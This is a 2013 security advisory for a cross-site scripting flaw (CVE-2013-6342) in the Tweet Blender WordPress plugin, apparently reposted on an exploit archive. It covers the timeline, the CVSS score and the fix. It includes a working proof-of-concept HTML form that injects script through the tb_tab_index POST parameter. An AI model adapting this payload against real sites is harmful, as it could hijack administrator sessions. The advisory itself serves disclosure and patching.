Lucene search

K
zdtHigh-Tech Bridge1337DAY-ID-21550
HistoryNov 19, 2013 - 12:00 a.m.

WordPress Tweet Blender 4.0.1 Cross Site Scripting Vulnerability

2013-11-1900:00:00
High-Tech Bridge
0day.today
55

EPSS

0.002

Percentile

58.6%

WordPress Tweet Blender plugin version 4.0.1 suffers from a cross site scripting vulnerability.

Product: Tweet Blender Wordpress Plugin
Vendor: kirilln
Vulnerable Version(s): 4.0.1 and probably prior
Tested Version: 4.0.1
Advisory Publication:  October 25, 2013  [without technical details]
Vendor Notification: October 25, 2013 
Vendor Patch: November 13, 2013 
Public Disclosure: November 15, 2013 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2013-6342
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in Tweet Blender Wordpress Plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks.


1) Cross-Site Scripting (XSS) in Tweet Blender Wordpress Plugin: CVE-2013-6342

1.1 The vulnerability exists due to insufficient sanitisation of user-supplied data in "tb_tab_index" HTTP POST parameter passed to "/wp-admin/options-general.php" script. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

The exploitation example below uses the "alert()" JavaScript function to display "imuniweb" word:


<form action="http://[host]/wp-admin/options-general.php?page=tweet-blender/admin-page.php" method="post" name="main">
<input type="hidden" name="tb_tab_index"  value='</script><script>alert("immuniweb");</script>'>
<input type="submit" id="btn">
</form>


-----------------------------------------------------------------------------------------------

Solution:

Update to Tweet Blender 4.0.2

More Information:
http://wordpress.org/plugins/tweet-blender/changelog/

-----------------------------------------------------------------------------------------------

#  0day.today [2018-01-04]  #